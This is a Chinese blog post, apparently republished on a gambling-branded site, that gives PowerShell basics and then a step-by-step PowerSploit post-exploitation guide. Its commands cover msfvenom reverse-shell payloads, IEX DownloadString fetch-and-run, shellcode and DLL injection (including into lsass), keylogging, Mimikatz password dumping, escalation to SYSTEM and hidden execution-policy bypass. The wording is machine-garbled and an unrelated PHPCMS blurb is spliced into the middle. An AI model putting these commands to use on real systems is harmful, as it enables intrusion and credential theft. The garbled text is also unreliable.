从零开始学PowerShell渗入测试 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

从零开始学PowerShell渗入测试

申博_安全防护 申博 54次浏览 未收录 0个评论

从零开始学PowerShell渗入测试

媒介

win7今后,powershell默许安装在windows上,这是一个异常壮大的渗入测试利器

主要用于后渗入的过程当中,扩展攻击面,本来没有怎样打仗过这玩意,近来发明了几款ps渗入框架才认识到了powershell的壮大。所以,照样准备好好学学。从零开始的那种。

基础语法入门

启动

直接经由过程启动栏输入powershell就好

简朴敕令

Get-Help

主题
Windows PowerShell 协助体系

Get-Alias

猎取当前会话中的一切别号
猎取别号以后你会发明,有许多和linux相通的敕令  cd  ls   tee  .....

关于Cmdlets

  • powershell里主要的敕令鸠合
  • 以.net情势存在
  • Get-Command -CommandType cmdlet 敕令能够猎取其敕令集

start-process

start-process  notepad.exe

Get-Process

猎取指定的历程

Get-Content

相似cat

Get-Location

相似pwd

Copy-Item

cp

Move-Item

mv

基础语法

运算符

· >:将输出保留到指定文件中(用法:Get-Process>output.txt)

· >>:将剧本的输出追加到指定文件中(用法:test.ps1>>output.txt)

· 2>:将毛病输出到指定文件中(Get-Porcess none 2>Errors.txt)

· 2>>:将毛病追加到指定文件中(Get-Process none 2> logs-Errors.txt)

· -eq:即是运算符(用法:$var1 –eq $var2,返回真或假)

· -gt:大于运算符(用法:$var1 –gt $var2,返回真或假)

· -match:婚配运算符,搜刮字符串是不是在文中涌现(用法:$Text –match $string返回真或假)

· -replace:替代字符串(用法:$Text –replace 被替代的字符,替代的字符,返回真或假)

· -in:测试一个字符或数字是不是涌现在文本中或列表中,声明列表直接运用()

数组

$Array = value1, value2, value3

语句

  • 前提语句
If($var {comparison_statement} $var2) { What_To_Do)}
Else {what_to_do_if_not}
  • 轮回语句
· While () {}

· Do {} While()

· For(;;;) {}

渗入测试框架PowerSploit

简介

https://github.com/mattifestation/PowerSploit.git

PowerSploit是Microsoft PowerShell模块的鸠合,可用于在评价的一切阶段协助渗入测试职员

有许多可用的模块,源码直接在git上能够下载到,以下就简朴引见一下运用要领。

CodeExecution模块

在目的主机实行代码

Invoke-Shellcode.ps1

向指定历程中注入我们的shellcode

设置可实行代码:

# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=1234 -f powershell -o /shell.txt
# msfconsole 监听适才的payload设置

靶机下载代码,并实行

PS C:\> Import-Module C:\PowerSploit\CodeExecution\Invoke-Shellcode.ps1
PS C:\> IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.1/shell.txt')
PS C:\> Invoke-Shellcode -Shellcode @($buf) -ProcessId 6284

Invoke-DllInjection.ps1

将本身的dll注入到目的机械的指定历程中,

administrator或许system权限操纵

设置dll

PHPCMS破绽剖析合集(下)

本篇详细分析了 PHPCMS 的部分历史漏洞。其中多是以获取到漏洞点为场景,反向挖掘至漏洞触发入口(假设自己发现了漏洞点,模拟如何找寻整个攻击链及其入口点),旨在提高自身代码审计能力。当中包含一些网络上未公开的触发点,以及补丁对比分析与绕过。 v9.6.1任意文件读取 这个版本的 任意文件读取 漏洞和上个版本的 SQL注入 漏洞原理是类似的,且出问题的文件均在 p

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.3.6 LPORT=1234 -f dll -o /root/Desktop/shell.dll

加载代码,实行

Import-Module C:\PowerSploit\CodeExecution\Invoke-DllInjection.ps1
Invoke-DllInjection -ProcessID 5560 -Dll shell.dll

Invoke-ReflectivePEInjection.ps1

长途注入dll

Import-Module C:\PowerSploit\CodeExecution\Invoke-ReflectivePEInjection.ps1
$PEBytes = [IO.File]::ReadAllBytes('c:\shell.dll')
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName 2008R2DC

Exfiltration模块

用来信息汇集的

截屏

Import-Module C:\PowerSploit\Exfiltration\Get-TimedScreenshot.ps1
Get-TimedScreenshot -Path c:\temp\ -Interval 5 -EndTime 11:23  每5秒截一次图,到11:23时完毕

键盘纪录

meterpreter再开的cmd[shell] 
Import-Module C:\PowerSploit\Exfiltration\Get-Keystrokes.ps1
Get-Keystrokes -LogPath C:\temp\key.log -Timeout 2  纪录2分钟

抓取Windows vault 中保留的种种暗码

Import-Module C:\PowerSploit\Exfiltration\Get-VaultCredential.ps1
Get-VaultCredential

mimikatz套件

Import-Module C:\PowerSploit\Exfiltration\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords exit" 抓取体系当地的用户暗码明文及hash

Privesc模块

用来提权的模块

将当前线程令牌提到system

Import-Module C:\PowerSploit\Privesc\Get-System.ps1
Get-System

实行提权的种种搜检

要搜检的内容比较多,如,可实行文件权限,效劳运转权限,搜检可被挟制的dll位置

Import-Module C:\PowerSploit\Privesc\PowerUp.ps1 
Invoke-AllChecks | Out-File pri_info.txt

内网信息汇集的一些小模块

端口扫描

Import-Module C:\PowerSploit\Recon\Invoke-Portscan.ps1
Invoke-Portscan -Hosts 192.168.3.0/24 -T 4 -Ports "21,22,23,80,1433,1521,3306,3389" | Out-File port_info.txt

dns反向剖析

Import-Module C:\PowerSploit\Recon\Invoke-ReverseDnsLookup.ps1 
Invoke-ReverseDnsLookup '192.168.3.20-192.168.3.24'

通晓

在实行powershell剧本时有些时刻会报错,有以下绕过的要领

当地权限绕过

PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1

当地隐蔽权限绕过

PowerShell.exe -ExecutionPolicy Bypass -NoLogo –NonInteractive -NoProfile -WindowStyle Hidden -File xxx.ps1

长途下载绕过

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://网址/对应剧本称号'); Invoke-Mimikatz -DumpCreds"

跋文

上面就是进修的powershell的一些笔记,这些笔记学的也比较深刻,归根接地这都是要运到实战上的,大牛勿喷,今后继承勤奋。


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明从零开始学PowerShell渗入测试
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址